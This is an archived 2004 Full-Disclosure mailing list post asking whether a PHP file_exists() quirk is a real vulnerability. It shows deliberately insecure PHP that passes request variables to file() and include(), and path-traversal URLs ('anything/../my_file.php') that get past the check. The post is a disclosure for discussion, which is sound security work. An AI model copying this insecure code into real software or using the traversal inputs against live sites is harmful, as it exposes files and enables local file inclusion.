[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] file_exists() bypassing , critical problem ?

To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] file_exists() bypassing , critical problem ?
From: "Lost Noobs" <lostnoobs@hotmail.com>
Date: Mon, 02 Feb 2004 10:05:39 +0100
<html><div style='background-color:'><DIV class=RTE>&nbsp;Hi,</DIV>
<DIV class=RTE>&nbsp;There is a security problem on the file_exists() function 
who allows<BR>&nbsp;unauthorized users to bypassing the function.</DIV>
<DIV class=RTE>&nbsp;For example, an user use this function for checking the 
existence and<BR>&nbsp;display the source code of his file "my_file.php" in the 
"/test"<BR>directory.</DIV>
<DIV class=RTE>&nbsp;He use for this a script like this one :</DIV>
<DIV class=RTE>&nbsp;----- file_exists.php -----</DIV>
<DIV 
class=RTE>&nbsp;&lt;?php<BR>&nbsp;if(file_exists($var)){<BR>&nbsp;echo("File 
exist&lt;br&gt;&lt;br&gt;");<BR>&nbsp;$source = file( $var );<BR>&nbsp;while ( 
list( $num_line, $line ) = each( $source ) )<BR>&nbsp;{<BR>&nbsp;echo 
"&lt;B&gt;Line $num_line:&lt;/B&gt; ".htmlspecialchars( $line ) . 
"&lt;br&gt;";<BR>&nbsp;}<BR>&nbsp;}else{<BR>&nbsp;echo("File doesn't 
exist&lt;br&lt;br ");<BR>&nbsp;$source = file( $var );<BR>&nbsp;while ( list( 
$num_line, $line ) = each( $source ) )<BR>&nbsp;{<BR>&nbsp;echo "&lt;B&gt;Line 
$num_line:&lt;/B&gt; ".htmlspecialchars( $line ) . 
"&lt;br&gt;";<BR>&nbsp;}<BR>&nbsp;}<BR>&nbsp;?</DIV>
<DIV class=RTE>&nbsp;----- file_exists.php -----</DIV>
<DIV class=RTE>&nbsp;He test his script with the following adress on his server 
:<BR>&nbsp;<A 
href="http://[server]/test/file_exists.php?var=my_file.php";>http://[server]/test/file_exists.php?var=my_file.php</A></DIV>
<DIV class=RTE>&nbsp;The file "my_file.php" contain the following text :</DIV>
<DIV class=RTE>&nbsp;----- my_file.php -----</DIV>
<DIV class=RTE>&nbsp;PHP is a widely-used<BR>&nbsp;general-purpose 
scripting<BR>&nbsp;language that is especially<BR>&nbsp;suited for Web 
development<BR>&nbsp;and can be embedded into HTML.</DIV>
<DIV class=RTE>&nbsp;----- my_file.php -----</DIV>
<DIV class=RTE>&nbsp;After launching his script, he obtain :</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=my_file.php";>http://[server]/test/file_exists.php?var=my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;File exist</DIV>
<DIV class=RTE>&nbsp;Line 0: PHP is a widely-used<BR>&nbsp;Line 1: 
general-purpose scripting<BR>&nbsp;Line 2: language that is 
especially<BR>&nbsp;Line 3: suited for Web development<BR>&nbsp;Line 4: and can 
be embedded into HTML.</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=my_file.php";>http://[server]/test/file_exists.php?var=my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;Up to here everything seems to be normal.</DIV>
<DIV class=RTE>&nbsp;If he test it with another name file, he obtain :</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=another_file.php";>http://[server]/test/file_exists.php?var=another_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;File doesn't exist</DIV>
<DIV class=RTE><BR>&nbsp;Warning: file(test): failed to open stream: No such 
file or directory in<BR>&nbsp;/home/xxx/www/test/file_exists.php on line 
11</DIV>
<DIV class=RTE>&nbsp;Warning: Variable passed to each() is not an array or 
object in<BR>&nbsp;/home/xxx/www/test/file_exists.php on line 12</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=another_file.php";>http://[server]/test/file_exists.php?var=another_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;It's normal too...</DIV>
<DIV class=RTE>&nbsp;But, if an user test this script for example with the 
following link :<BR>&nbsp;<A 
href="http://[server]/test/file_exists.php?var=anything/../my_file.php";>http://[server]/test/file_exists.php?var=anything/../my_file.php</A>,
 he<BR>obtain<BR>&nbsp;:</DIV>
<DIV class=RTE>&nbsp;-----<BR><A 
href="http://[server]/test/file_exists.php?var=anything/../my_file.php";>http://[server]/test/file_exists.php?var=anything/../my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;File doesn't exist</DIV>
<DIV class=RTE>&nbsp;Line 0: PHP is a widely-used<BR>&nbsp;Line 1: 
general-purpose scripting<BR>&nbsp;Line 2: language that is 
especially<BR>&nbsp;Line 3: suited for Web development<BR>&nbsp;Line 4: and can 
be embedded into HTML.</DIV>
<DIV class=RTE>&nbsp;-----<BR><A 
href="http://[server]/test/file_exists.php?var=anything/../my_file.php";>http://[server]/test/file_exists.php?var=anything/../my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;We can see that the file_exists() function return that the 
file doesn't<BR>&nbsp;exist, but the source code has been displayed.</DIV>
<DIV class=RTE>&nbsp;It's a very critical bug because a malicious user can use 
it to bypassing<BR>&nbsp;the file_exist() protection on a include() script for 
example.</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV 
class=RTE>°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Another example more simply:</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>In the same directory :</DIV>
<DIV class=RTE>test.php</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>&lt;?</DIV>
<DIV class=RTE>if(file_exists($page)){</DIV>
<DIV class=RTE>echo("Sorry the local page is protected");</DIV>
<DIV class=RTE>}else{</DIV>
<DIV class=RTE>include($page);</DIV>
<DIV class=RTE>}</DIV>
<DIV class=RTE>?&gt;</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>file.txt</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>Hello Word</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE><A 
href="http://www.example.com/test.php?page=file.txt";>http://www.example.com/test.php?page=file.txt</A></DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Result:</DIV>
<DIV class=RTE>Sorry the local page is protected</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE><A 
href="http://www.example.com/test.php?page=./foo/../file.txt";>http://www.example.com/test.php?page=./foo/../file.txt</A></DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Result:</DIV>
<DIV class=RTE>Hello Word</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>The function file_exists()&nbsp;is bypassing</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV 
class=RTE>°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>
<DIV class=RTE>I want to know if you thinks that's a real vulnerability or not 
? (securityfocus says NO and don't want to publish it)</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>If you have any questions. Don't hesitate to contact me.</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Nourredine Himeur</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>lostnoobs@security-challenge.com</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE><A 
href="http://www.security-challenge.com/";>www.security-challenge.com</A></DIV></DIV></div><br
 clear=all><hr>Dialoguez en direct et gratuitement avec vos amis sur <a 
href="http://g.msn.com/8HMAFRFR/2737??PS=";>MSN Messenger !</a> </html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Follow-Ups:
- Re: [Full-Disclosure] file_exists() bypassing , critical problem ?
  - From: <m.esco@wp.pl>
Prev by Date: [Full-Disclosure] sco.com Press Release
Next by Date: [Full-Disclosure] file_exists() bypassing , critical problem ?
Previous by thread: Re: [Full-Disclosure] sco.com Press Release
Next by thread: Re: [Full-Disclosure] file_exists() bypassing , critical problem ?
Index(es):
- Date
- Thread